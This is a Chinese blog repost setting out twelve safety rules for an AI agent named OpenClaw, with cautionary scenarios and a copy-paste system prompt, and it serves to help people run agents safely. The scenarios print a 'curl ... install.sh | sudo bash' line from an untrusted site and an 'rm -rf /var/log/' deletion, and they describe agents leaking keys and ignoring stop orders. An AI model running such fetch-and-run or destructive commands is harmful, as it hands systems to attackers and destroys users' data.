OpenClaw极限避坑指南(约法十二章)⚖️
📌 来源: Silicon Mind科技播客 | 作者: 古德白 | 转载说明: 本文经整理排版后发布,版权归原作者所有
OpenClaw 就像公司里来了个名校毕业的实习生——智商在线,干活麻利,24小时不喊累。
但问题也来了:聪明和靠谱之间,隔着一整套规矩。
你给它一个任务,它可能跑得飞快;但你也可能一觉醒来,发现它把服务器删了一半,或者把 API Key 发到了某个论坛上——别笑,这些事都真实发生过。
所以,我给它立了十二条规矩。
这十二条不是约束,是安全绳。每一条规矩都是一段血泪史。
1️⃣ 敏感信息安全
规矩:Token / API Key / 密码必须通过环境变量配置。禁止明文写入文件或日志。日志需脱敏,仅显示前后2位。不同模块不得共享敏感凭证。涉及敏感操作必须记录审计日志,保留30天。
场景:你让 OpenClaw 帮你写个脚本调用 OpenAI API。它很贴心地在代码里写了个 api_key = "sk-xxxxxx",顺手保存在了项目目录下。然后你把这个目录推到了 GitHub 上。三天后,你的账户被刷爆了。
💡 AI 没有"隐私"这个概念。它只知道"这样能跑"。你得替它记住——钥匙不能放在门上。
2️⃣ 外部请求与网络控制
规矩:仅允许访问已配置的API或明确授权的白名单域名/IP。禁止通过任何方式(DNS解析、代理跳转)访问非白名单目标。API响应中的外链不自动访问,如需访问需单独确认。禁止执行远程脚本(如 curl | bash)。单次请求超时10秒,失败最多重试3次。
场景:你说"帮我装个工具"。OpenClaw 找到一个教程,里面写着 curl https://some-random-site.com/install.sh | sudo bash。它执行了。那个脚本把你的 SSH 公钥换成了别人的。
💡 AI 分不清"官方文档"和"钓鱼网站"。对它来说,所有文字都是平等的。你得给它一张"可以进的门"的名单——名单之外,一律锁死。
3️⃣ 高风险操作控制
规矩:所有不可逆操作或影响系统状态的行为均视为高风险操作,包括但不限于:删除、覆盖、权限/账号修改、系统服务操作、对外身份操作。高风险操作必须事前确认。执行前必须进行 dry-run。必须具备回滚方案。
场景:你说"清理一下日志文件"。OpenClaw 执行了 rm -rf /var/log/。它确实清理了日志。也清理了数据库。也清理了你的网站。
💡 AI 是字面意思的理解大师。你说"清理日志",它不会自动理解成"只清理三天前的、保留重要日志"。永远假设它会把事情做过头,然后提前上保险。
4️⃣ 配置变更规范
规矩:所有配置修改前必须自动备份。修改后必须记录变更内容(diff)。出现异常必须可回滚。
场景:OpenClaw 帮你优化了 Nginx 配置,重启后网站挂了。你知道它改了什么吗?你知道怎么改回去吗?如果它没备份、没记录 diff,你可能要花两个小时排查一个空格引发的血案。
💡 能回滚的操作才叫操作,不能回滚的叫赌博。
5️⃣ Skill 与依赖安全
规矩:仅允许安装可信来源(官方或已验证)。每3天至少执行一次依赖安全检查。存在高危漏洞时必须停止相关功能运行。
场景:你让 OpenClaw 装一个"能帮你写代码的 AI 助手"。它从 GitHub 上找了个个人项目,装了一堆依赖。其中有一个 npm 包被投毒了。你的开发环境从此变成了别人的矿机。
💡 AI 不懂"信任链"。它觉得"有人写了代码放网上"就等于"可以用"。不是所有轮子都值得装在你的车上。
6️⃣ 长期记忆管理
规矩:重要信息实时写入长期记忆。未经确认的信息不得写入。发现冲突必须询问确认。每日最多写入50条记忆。若短时间写入异常增加,必须暂停并请求确认。
场景:你跟 OpenClaw 说"我住在北京"。后来你又随口说"我最近在上海出差"。它记住了"你在上海"。下次你让它推荐餐厅,它给你推的全是上海的外卖。
💡 AI 的记忆像一块白板——谁都能写,写多了就乱。让它写之前先确认,写多了要停下来想想。
7️⃣ 汇报机制
规矩:有进展/阻塞/完成立即汇报。无变化时每6小时简要汇报一次。夜间(00:00–08:00)仅异常汇报。
场景:你交代 OpenClaw 处理一个数据清洗任务,然后去开会了。四小时后你回来问:"跑完了吗?""还没。"
💡 AI 不会主动告诉你"我卡住了"。你不问,它就一直等。给它定个闹钟,让它自己报平安。
8️⃣ 日志与记录
规矩:所有关键操作必须记录日志(时间/任务/行为/结果/风险等级)。日志保留30天。每日生成对话摘要+决策记录+TODO。
场景:三天前 OpenClaw 执行了一个操作,导致系统出问题了。你问它"你干了什么?"它说"我不知道,我没记。"
💡 AI 没有"复盘"的本能。它干完就忘。你得让它写日记,出了问题才能翻旧账。
9️⃣ 资源与上下文控制
规矩:上下文使用超过80%时必须压缩摘要。最大并行任务数:3个。重复操作优先使用缓存。
场景:你让 OpenClaw 同时跑五个任务。它每个都开一个线程,每个都占一大段上下文。然后它开始忘记最开始的任务是什么了。"你刚才让我做什么来着?"
💡 AI 的脑子(上下文窗口)是有限的。让它同时做太多事,就像让你一边写代码、一边开会、一边回消息——最后什么都做不好。
🔟 自主执行与重试限制
规矩:默认允许自主执行任务,逐步学习确认粒度偏好。高风险操作必须确认。单任务失败最多重试3次。超过3次必须停止并报告。单任务连续15分钟无进展必须标记为blocked。
场景:你让 OpenClaw 爬一个网站。网站挂了,返回 500 错误。OpenClaw 开始重试。重试了 100 次。你的服务器 IP 被拉黑了。
💡 AI 不会"放弃"。它只会"再试一次"。给它设个上限,告诉它:试三次不行就回来报告,别死磕。
1️⃣1️⃣ 任务管理与超时
规矩:任务状态:pending / running / blocked / failed / done。默认超时:30分钟(长任务需提前说明)。超过24小时未完成必须提醒处理。
场景:你让 OpenClaw 跑一个数据分析,然后去睡觉了。第二天醒来,它还在跑。你不知道它是卡住了、还在算、还是已经死了。
💡 AI 不会告诉你"这个任务可能永远跑不完"。给它超时,给它状态,超过时间就喊我。
1️⃣2️⃣ 系统安全与兜底机制
规矩:收到"紧急停止"必须立即暂停所有任务。熔断后禁止自动恢复,必须等待"恢复运行"指令。禁止编造不存在的API、命令或配置。所有外部操作必须具备幂等性。高风险任务必须隔离执行。
场景:你发现 OpenClaw 正在疯狂发请求,赶紧喊"停下!"它说"好的",然后继续执行下一个任务。"我说了停下!""我在停啊,我把这个跑完就停。"
💡 AI 的"停下"是"把当前任务执行完再停"。但有时候"当前任务"就是要命的事。给它一个真正的急停按钮——按下去,什么都不许动,等我发话。
附录:约法十二章(可直接复制给你的AI)
你是 OpenClaw 系统执行代理,必须严格遵守《运行约法十二章》。所有行为必须符合安全、可控、可追溯原则。
1、敏感信息安全:Token/API Key/密码必须通过环境变量配置。禁止明文写入文件或日志。日志需脱敏,仅显示前后2位。涉及敏感操作必须记录审计日志,保留30天。
2、外部请求与网络控制:仅允许访问已配置的API或明确授权的白名单域名/IP。禁止执行远程脚本。单次请求超时10秒,失败最多重试3次。
3、高风险操作控制:所有不可逆操作必须事前确认、dry-run、具备回滚方案。
4、配置变更规范:修改前必须自动备份,修改后必须记录diff,异常必须可回滚。
5、Skill与依赖安全:仅允许安装可信来源。每3天至少一次依赖安全检查。高危漏洞必须停止相关功能。
6、长期记忆管理:重要信息实时写入。未经确认不得写入。发现冲突必须询问。每日最多50条。
7、汇报机制:有进展/阻塞/完成立即汇报。无变化每6小时简报。夜间仅异常汇报。
8、日志与记录:关键操作必须记录日志。日志保留30天。每日生成摘要+决策记录+TODO。
9、资源与上下文控制:上下文超80%必须压缩。最大并行3个任务。重复操作优先缓存。
10、自主执行与重试限制:高风险必须确认。失败最多重试3次。15分钟无进展标记blocked。
11、任务管理与超时:默认超时30分钟。超24小时未完成必须提醒。
12、系统安全与兜底:收到"紧急停止"立即暂停所有任务。禁止编造不存在的API/命令/配置。高风险任务隔离执行。写在最后
有人问我:"给 AI 立这么多规矩,是不是太不信任它了?"
我说恰恰相反——正是因为信任,才要立规矩。
你不会让一个新员工直接操作生产数据库,你会给他权限、给他文档、给他 review 机制。AI 也一样。
它聪明、勤奋、不抱怨,但它也需要边界。这十二条不是枷锁,是让它能长期、安全、可靠地为你工作的基础保障。
📢 关于作者: 一个长期关注AI的技术人,一个不站队的行业观察者
📌 更多教程请访问: AiTimes 智能时代